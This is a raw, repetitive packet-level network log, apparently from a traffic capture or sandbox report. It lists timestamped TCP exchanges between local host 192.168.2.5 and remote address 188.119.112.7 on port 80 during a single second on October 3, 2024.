                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235125065 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235157967 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235189915 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235192060 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235208035 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235224962 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235256910 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235291958 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235311031 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235327005 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235340118 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235361099 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235418081 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235451937 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235471010 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235501051 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235938072 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.235972881 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236006021 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236040115 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236071110 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236073017 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236092091 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236104965 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236139059 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236160040 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236171961 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236205101 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236238003 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236255884 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236269951 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236291885 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236855984 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236891031 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236924887 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236953020 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236958027 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236977100 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.236991882 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237025976 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237057924 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237077951 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237092018 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237106085 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237124920 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237158060 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237210035 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237776995 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237811089 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237833023 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237844944 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237879992 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237912893 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237943888 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237945080 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237962008 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.237977982 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238012075 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238040924 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238061905 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238073111 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238085985 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238110065 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238445997 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238478899 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238507986 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238558054 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238591909 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238624096 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238657951 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238661051 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238681078 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238692045 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238725901 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238759041 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238775969 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238790989 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238806009 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238823891 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238857031 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238886118 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238892078 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238924980 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238955975 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.238975048 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239012003 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239574909 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239609003 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239643097 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239676952 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239694118 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239710093 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239713907 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239744902 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239775896 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239809036 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239828110 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239842892 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239866972 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239876986 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239893913 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239906073 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239938021 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239970922 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.239989042 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240005016 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240026951 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240040064 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240446091 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240497112 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240498066 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240530014 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240545988 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240562916 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240596056 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240628958 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240645885 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240662098 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240674973 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240695000 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240725994 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240760088 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240776062 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240792990 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240811110 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240823984 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240854979 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240897894 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240926027 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240927935 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240946054 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.240962029 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241394997 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241410971 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241425037 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241440058 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241451025 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241455078 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241470098 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241470098 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241485119 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241487026 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241501093 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241517067 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241523027 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241533041 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241545916 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.241581917 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242161036 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242177010 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242189884 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242203951 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242218971 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242229939 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242232084 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242247105 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242263079 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242271900 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242271900 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242279053 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242294073 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242299080 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242309093 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242325068 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242338896 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242350101 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242355108 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242367029 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242372036 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.242415905 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243154049 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243170977 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243185043 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243200064 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243215084 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243227959 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243231058 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243246078 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243252039 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243261099 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243278027 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243289948 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243293047 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243308067 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243324041 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243343115 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.243547916 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244127035 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244143963 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244158030 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244173050 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244188070 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244203091 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244216919 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244223118 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244230986 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244242907 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244246960 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244261980 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244262934 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244277000 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244280100 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244292974 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244307995 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244307995 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244323015 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244335890 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244338989 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.244364023 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245058060 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245074034 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245088100 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245104074 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245117903 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245124102 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245142937 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245148897 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245157003 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245168924 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245174885 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245189905 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245203972 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245208979 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245229959 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245764971 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245784998 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245799065 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245815992 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245815039 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245831966 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245836973 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245848894 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245863914 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245879889 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245896101 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245898008 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245910883 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245918036 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245927095 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245939016 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245943069 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245959044 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.245975018 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246012926 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246762991 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246778965 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246793032 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246807098 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246823072 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246829987 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246838093 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246853113 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246853113 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246870041 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246885061 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246895075 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246901035 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246912956 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246917009 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246932983 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246941090 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246948004 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246963978 CEST8049704188.119.112.7192.168.2.5
